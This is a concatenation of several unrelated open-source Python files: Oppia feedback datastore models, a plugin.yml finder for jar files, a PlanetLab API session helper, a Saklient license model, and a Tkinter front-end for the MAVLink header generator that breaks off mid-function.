'subject': base_models.EXPORT_POLICY.EXPORTED,
'summary': base_models.EXPORT_POLICY.EXPORTED,
'has_suggestion': base_models.EXPORT_POLICY.EXPORTED,
'message_count': base_models.EXPORT_POLICY.EXPORTED,
'last_nonempty_message_text':
base_models.EXPORT_POLICY.EXPORTED,
'last_nonempty_message_author_id':
base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether GeneralFeedbackThreadModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(ndb.OR(
cls.original_author_id == user_id,
cls.last_nonempty_message_author_id == user_id
)).get(keys_only=True) is not None
@classmethod
def export_data(cls, user_id):
"""Exports the data from GeneralFeedbackThreadModel
into dict format for Takeout.
Args:
user_id: str. The ID of the user whose data should be exported.
Returns:
dict. Dictionary of the data from GeneralFeedbackThreadModel.
"""
user_data = dict()
feedback_models = cls.get_all().filter(
cls.original_author_id == user_id).fetch()
for feedback_model in feedback_models:
user_data[feedback_model.id] = {
'entity_type': feedback_model.entity_type,
'entity_id': feedback_model.entity_id,
'status': feedback_model.status,
'subject': feedback_model.subject,
'has_suggestion': feedback_model.has_suggestion,
'summary': feedback_model.summary,
'message_count': feedback_model.message_count,
'last_updated_msec': utils.get_time_in_millisecs(
feedback_model.last_updated)
}
return user_data
@classmethod
def generate_new_thread_id(cls, entity_type, entity_id):
"""Generates a new thread ID which is unique.
Args:
entity_type: str. The type of the entity.
entity_id: str. The ID of the entity.
Returns:
str. A thread ID that is different from the IDs of all
the existing threads within the given entity.
Raises:
Exception. There were too many collisions with existing thread IDs
when attempting to generate a new thread ID.
"""
for _ in python_utils.RANGE(_MAX_RETRIES):
thread_id = (
entity_type + '.' + entity_id + '.' +
utils.base64_from_int(utils.get_current_time_in_millisecs()) +
utils.base64_from_int(utils.get_random_int(_RAND_RANGE)))
if not cls.get_by_id(thread_id):
return thread_id
raise Exception(
'New thread id generator is producing too many collisions.')
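        # For illustration (added comment): a generated ID looks roughly like
        # 'exploration.eid123.WzE1OTAa1', i.e. the entity type, the entity id
        # and a generated string (a base64-encoded timestamp concatenated with
        # a base64-encoded random salt), joined by '.'.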
@classmethod
def create(cls, thread_id):
"""Creates a new FeedbackThreadModel entry.
Args:
thread_id: str. Thread ID of the newly-created thread.
Returns:
GeneralFeedbackThreadModel. The newly created FeedbackThreadModel
instance.
Raises:
Exception. A thread with the given thread ID exists already.
"""
if cls.get_by_id(thread_id):
raise Exception('Feedback thread ID conflict on create.')
return cls(id=thread_id)
@classmethod
def get_threads(
cls, entity_type, entity_id, limit=feconf.DEFAULT_QUERY_LIMIT):
"""Returns a list of threads associated with the entity, ordered
by their "last updated" field. The number of entities fetched is
limited by the `limit` argument to this method, whose default
value is equal to the default query limit.
Args:
entity_type: str. The type of the entity.
entity_id: str. The ID of the entity.
limit: int. The maximum possible number of items in the returned
list.
Returns:
list(GeneralFeedbackThreadModel). List of threads associated with
the entity. Doesn't include deleted entries.
"""
return cls.get_all().filter(cls.entity_type == entity_type).filter(
cls.entity_id == entity_id).order(-cls.last_updated).fetch(limit)
class GeneralFeedbackMessageModel(base_models.BaseModel):
"""Feedback messages. One or more of these messages make a thread.
The id of instances of this class has the form [thread_id].[message_id]
"""
# ID corresponding to an entry of FeedbackThreadModel.
thread_id = ndb.StringProperty(required=True, indexed=True)
# 0-based sequential numerical ID. Sorting by this field will create the
# thread in chronological order.
message_id = ndb.IntegerProperty(required=True, indexed=True)
# ID of the user who posted this message. This may be None if the feedback
# was given anonymously by a learner.
author_id = ndb.StringProperty(indexed=True)
# New thread status. Must exist in the first message of a thread. For the
# rest of the thread, should exist only when the status changes.
updated_status = ndb.StringProperty(choices=STATUS_CHOICES, indexed=True)
# New thread subject. Must exist in the first message of a thread. For the
# rest of the thread, should exist only when the subject changes.
updated_subject = ndb.StringProperty(indexed=False)
# Message text. Allowed not to exist (e.g. post only to update the status).
text = ndb.TextProperty(indexed=False)
# Whether the incoming message is received by email (as opposed to via
# the web).
received_via_email = (
ndb.BooleanProperty(default=False, indexed=True, required=True))
@staticmethod
def get_deletion_policy():
"""General feedback message needs to be pseudonymized for the user."""
return base_models.DELETION_POLICY.LOCALLY_PSEUDONYMIZE
@classmethod
def get_export_policy(cls):
"""Model contains user data."""
return dict(super(cls, cls).get_export_policy(), **{
'thread_id': base_models.EXPORT_POLICY.EXPORTED,
'message_id': base_models.EXPORT_POLICY.EXPORTED,
'author_id': base_models.EXPORT_POLICY.EXPORTED,
'updated_status': base_models.EXPORT_POLICY.EXPORTED,
'updated_subject': base_models.EXPORT_POLICY.EXPORTED,
'text': base_models.EXPORT_POLICY.EXPORTED,
'received_via_email': base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether GeneralFeedbackMessageModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(cls.author_id == user_id).get(
keys_only=True) is not None
@classmethod
def export_data(cls, user_id):
"""Exports the data from GeneralFeedbackMessageModel
into dict format for Takeout.
Args:
user_id: str. The ID of the user whose data should be exported.
Returns:
dict. Dictionary of the data from GeneralFeedbackMessageModel.
"""
user_data = dict()
feedback_models = cls.get_all().filter(cls.author_id == user_id).fetch()
for feedback_model in feedback_models:
user_data[feedback_model.id] = {
'thread_id': feedback_model.thread_id,
'message_id': feedback_model.message_id,
'updated_status': feedback_model.updated_status,
'updated_subject': feedback_model.updated_subject,
'text': feedback_model.text,
'received_via_email': feedback_model.received_via_email
}
return user_data
@classmethod
def _generate_id(cls, thread_id, message_id):
"""Generates full message ID given the thread ID and message ID.
Args:
thread_id: str. Thread ID of the thread to which the message
belongs.
message_id: int. Message ID of the message.
Returns:
str. Full message ID.
"""
return '.'.join([thread_id, python_utils.UNICODE(message_id)])
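        # Example (added comment): message 4 of thread
        # 'exploration.eid123.WzE1OTAa1' gets the full id
        # 'exploration.eid123.WzE1OTAa1.4'.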
@property
def entity_id(self):
"""Returns the entity_id corresponding to this thread instance.
Returns:
str. The entity_id.
"""
return self.id.split('.')[1]
@property
def entity_type(self):
"""Returns the entity_type corresponding to this thread instance.
Returns:
str. The entity_type.
"""
return self.id.split('.')[0]
@classmethod
def create(cls, message_identifier):
"""Creates a new GeneralFeedbackMessageModel entry.
Args:
message_identifier: FullyQualifiedMessageIdentifier. The message
identifier consists of the thread_id and its corresponding
message_id.
Returns:
GeneralFeedbackMessageModel. Instance of the new
GeneralFeedbackMessageModel entry.
Raises:
Exception. A message with the same ID already exists
in the given thread.
"""
return cls.create_multi([message_identifier])[0]
@classmethod
def create_multi(cls, message_identifiers):
"""Creates a new GeneralFeedbackMessageModel entry for each
(thread_id, message_id) pair.
Args:
message_identifiers: list(FullyQualifiedMessageIdentifier). Each
message identifier consists of the thread_id and its
corresponding message_id.
Returns:
list(GeneralFeedbackMessageModel). Instances of the new
GeneralFeedbackMessageModel entries.
Raises:
Exception. The number of thread_ids must be equal to the number of
message_ids.
Exception. A message with the same ID already exists
in the given thread.
"""
thread_ids = [
message_identifier.thread_id for message_identifier
in message_identifiers]
message_ids = [
message_identifier.message_id for message_identifier
in message_identifiers]
# Generate the new ids.
instance_ids = [
cls._generate_id(thread_id, message_id) for thread_id, message_id
in python_utils.ZIP(thread_ids, message_ids)
]
# Check if the new ids are valid.
current_instances = cls.get_multi(instance_ids)
conflict_ids = [
current_instance.id for current_instance in current_instances if
current_instance is not None
]
if len(conflict_ids) > 0:
raise Exception(
'The following feedback message ID(s) conflicted on '
'create: %s' % (' '.join(conflict_ids))
)
return [cls(id=instance_id) for instance_id in instance_ids]
@classmethod
def get(cls, thread_id, message_id, strict=True):
"""Gets the GeneralFeedbackMessageModel entry for the given ID. Raises
an error if no undeleted message with the given ID is found and
strict == True.
Args:
thread_id: str. ID of the thread.
message_id: int. ID of the message.
strict: bool. Whether to raise an error if no FeedbackMessageModel
entry is found for the given IDs.
Returns:
GeneralFeedbackMessageModel or None. If strict == False and no
undeleted message with the given message_id exists in the
datastore, then returns None. Otherwise, returns the
GeneralFeedbackMessageModel instance that corresponds to the
given ID.
Raises:
EntityNotFoundError. The value of strict is True and either
(i) message ID is not valid
(ii) message is marked as deleted.
No error will be raised if strict == False.
"""
instance_id = cls._generate_id(thread_id, message_id)
return super(GeneralFeedbackMessageModel, cls).get(
instance_id, strict=strict)
@classmethod
def get_messages(cls, thread_id):
"""Returns a list of messages in the given thread. The number of
messages returned is capped by feconf.DEFAULT_QUERY_LIMIT.
Args:
thread_id: str. ID of the thread.
Returns:
list(GeneralFeedbackMessageModel). A list of messages in the
given thread, up to a maximum of feconf.DEFAULT_QUERY_LIMIT
messages.
"""
return cls.get_all().filter(
cls.thread_id == thread_id).fetch(feconf.DEFAULT_QUERY_LIMIT)
@classmethod
def get_most_recent_message(cls, thread_id):
"""Returns the last message in the thread.
Args:
thread_id: str. ID of the thread.
Returns:
GeneralFeedbackMessageModel. Last message in the thread.
"""
thread = GeneralFeedbackThreadModel.get_by_id(thread_id)
return cls.get(thread_id, thread.message_count - 1)
@classmethod
def get_message_count(cls, thread_id):
"""Returns the number of messages in the thread. Includes the
deleted entries.
Args:
thread_id: str. ID of the thread.
Returns:
int. Number of messages in the thread.
"""
return cls.get_message_counts([thread_id])[0]
@classmethod
def get_message_counts(cls, thread_ids):
"""Returns a list containing the number of messages in the threads.
Includes the deleted entries.
Args:
thread_ids: list(str). ID of the threads.
Returns:
list(int). List of the message counts for the threads.
"""
thread_models = GeneralFeedbackThreadModel.get_multi(thread_ids)
return [thread_model.message_count for thread_model in thread_models]
@classmethod
def get_all_messages(cls, page_size, urlsafe_start_cursor):
"""Fetches a list of all the messages sorted by their last updated
attribute.
Args:
page_size: int. The maximum number of messages to be returned.
urlsafe_start_cursor: str or None. If provided, the list of
returned messages starts from this datastore cursor.
Otherwise, the returned messages start from the beginning
of the full list of messages.
Returns:
3-tuple of (results, cursor, more). Where:
results: List of query results.
cursor: str or None. A query cursor pointing to the next
batch of results. If there are no more results, this might
be None.
more: bool. If True, there are (probably) more results after
this batch. If False, there are no further results after
this batch.
"""
return cls._fetch_page_sorted_by_last_updated(
cls.query(), page_size, urlsafe_start_cursor)
class GeneralFeedbackThreadUserModel(base_models.BaseModel):
"""Model for storing the ids of the messages in the thread that are read by
the user.
Instances of this class have keys of the form [user_id].[thread_id]
"""
user_id = ndb.StringProperty(required=True, indexed=True)
thread_id = ndb.StringProperty(required=True, indexed=True)
message_ids_read_by_user = ndb.IntegerProperty(repeated=True, indexed=True)
@staticmethod
def get_deletion_policy():
"""General feedback thread user can be deleted since it only contains
information relevant to the one user.
"""
return base_models.DELETION_POLICY.DELETE
@classmethod
def get_export_policy(cls):
"""Model contains user data."""
return dict(super(cls, cls).get_export_policy(), **{
'user_id': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'thread_id': base_models.EXPORT_POLICY.EXPORTED,
'message_ids_read_by_user':
base_models.EXPORT_POLICY.EXPORTED
})
@classmethod
def apply_deletion_policy(cls, user_id):
"""Delete instance of GeneralFeedbackThreadUserModel for the user.
Args:
user_id: str. The ID of the user whose data should be deleted.
"""
ndb.delete_multi(
cls.query(cls.user_id == user_id).fetch(keys_only=True))
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether GeneralFeedbackThreadUserModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return cls.query(cls.user_id == user_id).get(keys_only=True) is not None
@classmethod
def generate_full_id(cls, user_id, thread_id):
"""Generates the full message id of the format:
<user_id.thread_id>.
Args:
user_id: str. The user id.
thread_id: str. The thread id.
Returns:
str. The full message id.
"""
return '%s.%s' % (user_id, thread_id)
@classmethod
def get(cls, user_id, thread_id):
"""Gets the FeedbackThreadUserModel corresponding to the given user and
the thread.
Args:
user_id: str. The id of the user.
thread_id: str. The id of the thread.
Returns:
            FeedbackThreadUserModel. The FeedbackThreadUserModel instance that
                matches the given user_id and thread_id.
"""
instance_id = cls.generate_full_id(user_id, thread_id)
return super(GeneralFeedbackThreadUserModel, cls).get(
instance_id, strict=False)
@classmethod
def create(cls, user_id, thread_id):
"""Creates a new FeedbackThreadUserModel instance and returns it.
Args:
user_id: str. The id of the user.
thread_id: str. The id of the thread.
Returns:
FeedbackThreadUserModel. The newly created FeedbackThreadUserModel
instance.
"""
return cls.create_multi(user_id, [thread_id])[0]
@classmethod
def create_multi(cls, user_id, thread_ids):
"""Creates new FeedbackThreadUserModel instances for user_id for each
of the thread_ids.
Args:
user_id: str. The id of the user.
thread_ids: list(str). The ids of the threads.
Returns:
list(FeedbackThreadUserModel). The newly created
FeedbackThreadUserModel instances.
"""
new_instances = []
for thread_id in thread_ids:
instance_id = cls.generate_full_id(user_id, thread_id)
new_instance = cls(
id=instance_id, user_id=user_id, thread_id=thread_id)
new_instances.append(new_instance)
GeneralFeedbackThreadUserModel.put_multi(new_instances)
return new_instances
@classmethod
def get_multi(cls, user_id, thread_ids):
"""Gets the ExplorationUserDataModel corresponding to the given user and
the thread ids.
Args:
user_id: str. The id of the user.
thread_ids: list(str). The ids of the threads.
Returns:
list(FeedbackThreadUserModel). The FeedbackThreadUserModels
                corresponding to the given user and thread ids.
"""
instance_ids = [
cls.generate_full_id(user_id, thread_id)
for thread_id in thread_ids]
return super(GeneralFeedbackThreadUserModel, cls).get_multi(
instance_ids)
@classmethod
def export_data(cls, user_id):
"""Takeout: Export GeneralFeedbackThreadUserModel user-based properties.
Args:
user_id: str. The user_id denotes which user's data to extract.
Returns:
dict. A dict containing the user-relevant properties of
GeneralFeedbackThreadUserModel, i.e., which messages have been
read by the user (as a list of ids) in each thread.
"""
found_models = cls.get_all().filter(cls.user_id == user_id)
user_data = {}
for user_model in found_models:
user_data[user_model.thread_id] = (
user_model.message_ids_read_by_user)
return user_data
class FeedbackAnalyticsModel(base_models.BaseMapReduceBatchResultsModel):
"""Model for storing feedback thread analytics for an exploration.
The key of each instance is the exploration ID.
"""
# The number of open feedback threads for this exploration.
num_open_threads = ndb.IntegerProperty(default=None, indexed=True)
# Total number of feedback threads for this exploration.
num_total_threads = ndb.IntegerProperty(default=None, indexed=True)
@staticmethod
def get_deletion_policy():
"""Feedback analytic model should be kept if the associated exploration
is public.
"""
return base_models.DELETION_POLICY.KEEP_IF_PUBLIC
@classmethod
def get_export_policy(cls):
"""Model does not contain user data."""
return dict(super(cls, cls).get_export_policy(), **{
'num_open_threads': base_models.EXPORT_POLICY.NOT_APPLICABLE,
'num_total_threads': base_models.EXPORT_POLICY.NOT_APPLICABLE
})
@classmethod
def has_reference_to_user_id(cls, unused_user_id):
"""FeedbackAnalyticsModel doesn't reference any user_id directly.
Args:
unused_user_id: str. The (unused) ID of the user whose data
should be checked.
Returns:
bool. Whether any models refer to the given user ID.
"""
return False
@classmethod
def create(cls, model_id, num_open_threads, num_total_threads):
"""Creates a new FeedbackAnalyticsModel entry.
Args:
model_id: str. ID of the model instance to be created. This
is the same as the exploration ID.
num_open_threads: int. Number of open feedback threads for
this exploration.
num_total_threads: int. Total number of feedback threads for
this exploration.
"""
cls(
id=model_id,
num_open_threads=num_open_threads,
num_total_threads=num_total_threads
).put()
class UnsentFeedbackEmailModel(base_models.BaseModel):
"""Model for storing feedback messages that need to be sent to creators.
Instances of this model contain information about feedback messages that
have been received by the site, but have not yet been sent to creators.
The model instances will be deleted once the corresponding email has been
sent.
The id of each model instance is the user_id of the user who should receive
the messages.
"""
# The list of feedback messages that need to be sent to this user.
# Each element in this list is a dict with keys 'entity_type', 'entity_id',
# 'thread_id' and 'message_id'; this information is used to retrieve
# corresponding FeedbackMessageModel instance.
feedback_message_references = ndb.JsonProperty(repeated=True)
# The number of failed attempts that have been made (so far) to
# send an email to this user.
retries = ndb.IntegerProperty(default=0, required=True, indexed=True)
@staticmethod
def get_deletion_policy():
"""Unsent feedback email is kept until sent."""
return base_models.DELETION_POLICY.KEEP
@classmethod
def get_export_policy(cls):
"""Model does not contain user data."""
return dict(super(cls, cls).get_export_policy(), **{
'feedback_message_references':
base_models.EXPORT_POLICY.NOT_APPLICABLE,
'retries': base_models.EXPORT_POLICY.NOT_APPLICABLE
})
@classmethod
def has_reference_to_user_id(cls, user_id):
"""Check whether UnsentFeedbackEmailModel exists for user.
Args:
user_id: str. The ID of the user whose data should be checked.
Returns:
bool. Whether the model for user_id exists.
"""
return cls.get_by_id(user_id) is not None
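    # Illustrative shape of one feedback_message_references entry (added
    # comment; values are invented):
    #   {'entity_type': 'exploration', 'entity_id': 'eid123',
    #    'thread_id': 'exploration.eid123.WzE1OTAa1', 'message_id': 2}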
| apache-2.0 | 907,305,869,170,521,900 | 35.632184 | 80 | 0.627654 | false |
BukGet/devfiles | jarparse.py | 1 | 1481 | #!/usr/bin/env python
from zipfile import ZipFile
from cStringIO import StringIO
import yaml
import sys
def find_plugin_yaml(dataobj):
'''
'''
yml = False
try:
# The first thing we are going to try to do is create a ZipFile
# object with the StringIO data that we have.
zfile = ZipFile(dataobj)
except:
print '[DEBUG] ZipFile Library Failed to Parse DataObject'
else:
# Before we start recursively jumping through hoops, lets first
# check to see if the plugin.yml exists at this level. If so, then
# just set the yaml variable. Otherwise we are gonna look for more
# zip and jar files and dig into them.
if 'plugin.yml' in zfile.namelist():
try:
yml = yaml.load(zfile.read('plugin.yml'))
except:
return False
else:
for filename in zfile.namelist():
if not yml and filename[-3:].lower() in ['zip', 'jar']:
print '[DEBUG] Found Zip/Jar file ' + filename
data = StringIO()
data.write(zfile.read(filename))
yml = find_plugin_yaml(data)
data.close()
zfile.close()
return yml
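# Note (added): the search recurses into any .zip/.jar members it encounters,
# so a plugin.yml buried inside a nested jar (e.g. a bundled dependency) is
# still found; the first successfully parsed plugin.yml wins.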
if __name__ == '__main__':
print yaml.dump(find_plugin_yaml(open(sys.argv[1], 'r'))) | mit | 4,808,092,771,281,465,000 | 36.05 | 79 | 0.518569 | false |
jheretic/operator | plsync/planetlab/session.py | 6 | 5328 | #!/usr/bin/env python
import ConfigParser
import getpass
import os
import sys
import xmlrpclib
import ssl
API_URL = "https://boot.planet-lab.org/PLCAPI/"
PLC_CONFIG="/etc/planetlab.conf"
SESSION_DIR=os.environ['HOME'] + "/.ssh"
SESSION_FILE=SESSION_DIR + "/mlab_session"
api = None
def setup_global_session(url, debug, verbose, plcconfig=None):
global api
global API_URL
API_URL=url
api = getapi(debug, verbose, plcconfig)
return api
def read_plc_config(filename):
""" Use python's ConfigParser() to extract user credentials from filename.
File should include:
[MyPLC]
username=
password=
Args:
filename - full path to config file
Returns:
(username, password) tuple
Raises:
ConfigParser.NoSectionError - when MyPLC section does not exist.
ConfigParser.NoOptionError - when value is not specified in section.
"""
config = ConfigParser.SafeConfigParser()
config.read(filename)
un = config.get("MyPLC", "username")
pw = config.get("MyPLC", "password")
return (un, pw)
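# An illustrative example of the expected file contents (placeholder values,
# not taken from the original source):
#
#     [MyPLC]
#     username=user@example.com
#     password=secret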
class API:
def __init__(self, auth, url, debug=False, verbose=False):
self.debug = debug
self.verbose = verbose
self.auth = auth
self.api = get_xmlrpc_server(url)
def __repr__(self):
return self.api.__repr__()
def __getattr__(self, name):
run = True
if self.debug and 'Get' not in name:
# Do no run when debug=True & not a Get* api call
run = False
method = getattr(self.api, name)
if method is None:
raise AssertionError("method does not exist")
#if self.verbose:
# print "%s(%s)" % (name, params)
def call_method(auth, *params):
if self.verbose:
print "%s(%s)" % (name, params)
return method(self.auth, *params)
if run:
return lambda *params : call_method(self.auth, *params)
else:
print "DEBUG: Skipping %s()" % name
return lambda *params : 1
#return lambda *params : call_method(*params)
#return call_method(*params)
def refreshsession(plcconfig=None):
# Either read session from disk or create it and save it for later
if plcconfig is not None and os.path.exists(plcconfig):
print "Using credentials from: ", plcconfig
(username, password) = read_plc_config(plcconfig)
else:
print "PLC Username: ",
sys.stdout.flush()
username = sys.stdin.readline().strip()
password = getpass.getpass("PLC Password: ")
auth = {'Username' : username,
'AuthMethod' : 'password',
'AuthString' : password}
plc = API(auth, API_URL)
session = plc.GetSession(60*60*24*30)
try:
os.makedirs(SESSION_DIR)
except:
pass
session_map = parse_sessions(SESSION_FILE, fail_on_open=False)
session_map[API_URL] = session
write_sessions(SESSION_FILE, session_map)
def write_sessions(session_file, session_map):
f = open(SESSION_FILE, 'w')
for url in session_map.keys():
print >>f, url, session_map[url]
f.close()
def parse_sessions(session_file, fail_on_open=True):
try:
session_lines = open(SESSION_FILE, 'r').readlines()
except:
if fail_on_open:
# throw the error for someone else to catch
raise
else:
# return an empty map
return {}
session_map = {}
for line in session_lines:
f = line.strip().split()
if len(f) == 0:
continue
elif len(f) == 1:
print "old format session file: remove %s and rerun" % SESSION_FILE
sys.exit(1)
elif len(f) > 2:
print "too many fields in session line"
sys.exit(1)
else:
(url, session) = f
session_map[url] = session
return session_map
def get_xmlrpc_server(url):
try:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
except AttributeError:
sys.stderr.write('WARNING: Using an unverified HTTPS context!!!\n')
sys.stderr.write('WARNING: Upgrade python to >= 2.7.9!!!\n')
raise
context.load_verify_locations(
os.path.join(os.path.dirname(os.path.realpath(__file__)),
"../../boot.planet-lab.org.ca"))
return xmlrpclib.ServerProxy(
url, verbose=False, allow_none=True, context=context)
def getapi(debug=False, verbose=False, plcconfig=None):
global api
api = get_xmlrpc_server(API_URL)
auth = None
authorized = False
while not authorized:
try:
auth = {}
auth['AuthMethod'] = 'session'
session_map = parse_sessions(SESSION_FILE)
auth['session'] = session_map[API_URL]
authorized = api.AuthCheck(auth)
if not authorized:
print "Need to refresh your PLC session file: %s" % SESSION_FILE
sys.stdout.flush()
refreshsession(plcconfig)
except:
print "Need to setup a new PLC session file: %s" % SESSION_FILE
sys.stdout.flush()
refreshsession(plcconfig)
assert auth is not None
return API(auth, API_URL, debug, verbose)
| apache-2.0 | -6,156,578,141,638,329,000 | 29.272727 | 80 | 0.588589 | false |
sakura-internet/saklient.python | saklient/cloud/models/model_license.py | 1 | 4572 | # -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from ..client import Client
from .model import Model
from ..resources.resource import Resource
from ..resources.license import License
from ...util import Util
import saklient
str = six.text_type
# module saklient.cloud.models.model_license
class Model_License(Model):
    ## A class providing functionality to search for and create licenses.
## @private
# @return {str}
def _api_path(self):
return "/license"
## @private
# @return {str}
def _root_key(self):
return "License"
## @private
# @return {str}
def _root_key_m(self):
return "Licenses"
## @private
# @return {str}
def _class_name(self):
return "License"
## @private
# @param {any} obj
# @param {bool} wrapped=False
# @return {saklient.cloud.resources.resource.Resource}
def _create_resource_impl(self, obj, wrapped=False):
Util.validate_type(wrapped, "bool")
return License(self._client, obj, wrapped)
    ## Specifies the starting offset of the list to be fetched next.
    #
    # @param {int} offset Offset
# @return {saklient.cloud.models.model_license.Model_License} this
def offset(self, offset):
Util.validate_type(offset, "int")
return self._offset(offset)
    ## Specifies the maximum number of records of the list to be fetched next.
    #
    # @param {int} count Maximum number of records
# @return {saklient.cloud.models.model_license.Model_License} this
def limit(self, count):
Util.validate_type(count, "int")
return self._limit(count)
    ## Directly specifies the filtering settings for the Web API.
    #
    # @param {str} key Key
    # @param {any} value Value
    # @param {bool} multiple=False Specify true to pass an array as value and perform an exact-match search combined with OR. Normally value is a scalar and a fuzzy search is performed.
# @return {saklient.cloud.models.model_license.Model_License}
def filter_by(self, key, value, multiple=False):
Util.validate_type(key, "str")
Util.validate_type(multiple, "bool")
return self._filter_by(key, value, multiple)
    ## Discards all the state configured for the next request.
#
# @return {saklient.cloud.models.model_license.Model_License} this
def reset(self):
return self._reset()
    ## Prepares an object for creating a new resource.
    #
    # Set parameters on the returned object and call save() to create the actual resource.
    #
    # @return {saklient.cloud.resources.license.License} resource object
def create(self):
return self._create()
    ## Fetches the unique resource that has the specified ID.
    #
    # @param {str} id
    # @return {saklient.cloud.resources.license.License} resource object
def get_by_id(self, id):
Util.validate_type(id, "str")
return self._get_by_id(id)
    ## Performs the resource search request and fetches the results as a list.
    #
    # @return {saklient.cloud.resources.license.License[]} array of resource objects
def find(self):
return self._find()
    ## Narrows the results down to resources whose names contain the specified string.
    #
    # The search is case-insensitive.
    # When multiple strings separated by spaces are given, resources must contain all of them.
#
# @todo Implement test case
# @param {str} name
# @return {saklient.cloud.models.model_license.Model_License}
def with_name_like(self, name):
Util.validate_type(name, "str")
return self._with_name_like(name)
    ## Sorts the results by name.
#
# @todo Implement test case
# @param {bool} reverse=False
# @return {saklient.cloud.models.model_license.Model_License}
def sort_by_name(self, reverse=False):
Util.validate_type(reverse, "bool")
return self._sort_by_name(reverse)
## @ignore
# @param {saklient.cloud.client.Client} client
def __init__(self, client):
super(Model_License, self).__init__(client)
Util.validate_type(client, "saklient.cloud.client.Client")
| mit | -4,517,385,638,724,693,000 | 28 | 99 | 0.632543 | false |
Nolan330/CS292 | mavgenerate.py | 9 | 7288 | #!/usr/bin/env python
"""\
generate.py is a GUI front-end for mavgen, a python based MAVLink
header generation tool.
Notes:
-----
* 2012-7-16 -- dagoodman
Working on Mac 10.6.8 darwin, with Python 2.7.1
* 2012-7-17 -- dagoodman
Only GUI code working on Mac 10.6.8 darwin, with Python 3.2.3
Working on Windows 7 SP1, with Python 2.7.3 and 3.2.3
Mavgen doesn't work with Python 3.x yet
* 2012-9-25 -- dagoodman
Passing error limit into mavgen to make output cleaner.
Copyright 2012 David Goodman ([email protected])
Released under GNU GPL version 3 or later
"""
import os
import re
import pprint
# Python 2.x and 3.x compatibility
try:
from tkinter import *
import tkinter.filedialog
import tkinter.messagebox
except ImportError as ex:
# Must be using Python 2.x, import and rename
from Tkinter import *
import tkFileDialog
import tkMessageBox
tkinter.filedialog = tkFileDialog
del tkFileDialog
tkinter.messagebox = tkMessageBox
del tkMessageBox
sys.path.append(os.path.join('pymavlink','generator'))
from mavgen import *
DEBUG = False
title = "MAVLink Generator"
error_limit = 5
class Application(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack_propagate(0)
self.grid( sticky=N+S+E+W)
self.createWidgets()
self.pp = pprint.PrettyPrinter(indent=4)
"""\
Creates the gui and all of its content.
"""
def createWidgets(self):
#----------------------------------------
# Create the XML entry
self.xml_value = StringVar()
self.xml_label = Label( self, text="XML" )
self.xml_label.grid(row=0, column = 0)
self.xml_entry = Entry( self, width = 26, textvariable=self.xml_value )
self.xml_entry.grid(row=0, column = 1)
self.xml_button = Button (self, text="Browse", command=self.browseXMLFile)
self.xml_button.grid(row=0, column = 2)
#----------------------------------------
# Create the Out entry
self.out_value = StringVar()
self.out_label = Label( self, text="Out" )
self.out_label.grid(row=1,column = 0)
self.out_entry = Entry( self, width = 26, textvariable=self.out_value )
self.out_entry.grid(row=1, column = 1)
self.out_button = Button (self, text="Browse", command=self.browseOutDirectory)
self.out_button.grid(row=1, column = 2)
#----------------------------------------
# Create the Lang box
self.language_value = StringVar()
self.language_choices = [ "C", "Python", "CS", "Javascript", "WLua" ]
self.language_label = Label( self, text="Lang" )
self.language_label.grid(row=2, column=0)
self.language_menu = OptionMenu(self,self.language_value,*self.language_choices)
self.language_value.set(self.language_choices[0])
self.language_menu.config(width=10)
self.language_menu.grid(row=2, column=1,sticky=W)
#----------------------------------------
# Create the Protocol box
self.protocol_value = StringVar()
self.protocol_choices = [ "v0.9", "v1.0" ]
self.protocol_label = Label( self, text="Protocol")
self.protocol_label.grid(row=3, column=0)
self.protocol_menu = OptionMenu(self,self.protocol_value,*self.protocol_choices)
self.protocol_value.set(self.protocol_choices[1])
self.protocol_menu.config(width=10)
self.protocol_menu.grid(row=3, column=1,sticky=W)
#----------------------------------------
# Create the generate button
self.generate_button = Button ( self, text="Generate", command=self.generateHeaders)
self.generate_button.grid(row=4,column=1)
"""\
Open a file selection window to choose the XML message definition.
"""
def browseXMLFile(self):
# TODO Allow specification of multipe XML definitions
xml_file = tkinter.filedialog.askopenfilename(parent=self, title='Choose a definition file')
if DEBUG:
print("XML: " + xml_file)
if xml_file != None:
self.xml_value.set(xml_file)
"""\
Open a directory selection window to choose an output directory for
headers.
"""
def browseOutDirectory(self):
mavlinkFolder = os.path.dirname(os.path.realpath(__file__))
out_dir = tkinter.filedialog.askdirectory(parent=self,initialdir=mavlinkFolder,title='Please select an output directory')
if DEBUG:
print("Output: " + out_dir)
if out_dir != None:
self.out_value.set(out_dir)
"""\
Generates the header files and place them in the output directory.
"""
def generateHeaders(self):
# Verify settings
rex = re.compile(".*\\.xml$", re.IGNORECASE)
if not self.xml_value.get():
            tkinter.messagebox.showerror('Error Generating Headers','An XML message definition file must be specified.')
return
if not self.out_value.get():
tkinter.messagebox.showerror('Error Generating Headers', 'An output directory must be specified.')
return
if os.path.isdir(self.out_value.get()):
if not tkinter.messagebox.askokcancel('Overwrite Headers?','The output directory \'{0}\' already exists. Headers may be overwritten if they already exist.'.format(self.out_value.get())):
return
# Verify XML file with schema (or do this in mavgen)
# TODO write XML schema (XDS)
# Generate headers
opts = MavgenOptions(self.language_value.get(), self.protocol_value.get()[1:], self.out_value.get(), error_limit);
args = [self.xml_value.get()]
if DEBUG:
print("Generating headers")
self.pp.pprint(opts)
self.pp.pprint(args)
try:
mavgen(opts,args)
tkinter.messagebox.showinfo('Successfully Generated Headers', 'Headers generated succesfully.')
except Exception as ex:
exStr = formatErrorMessage(str(ex));
if DEBUG:
                print('An error occurred while generating headers:\n\t{0!s}'.format(ex))
tkinter.messagebox.showerror('Error Generating Headers','{0!s}'.format(exStr))
return
"""\
Format the mavgen exceptions by removing "ERROR: ".
"""
def formatErrorMessage(message):
reObj = re.compile(r'^(ERROR):\s+',re.M);
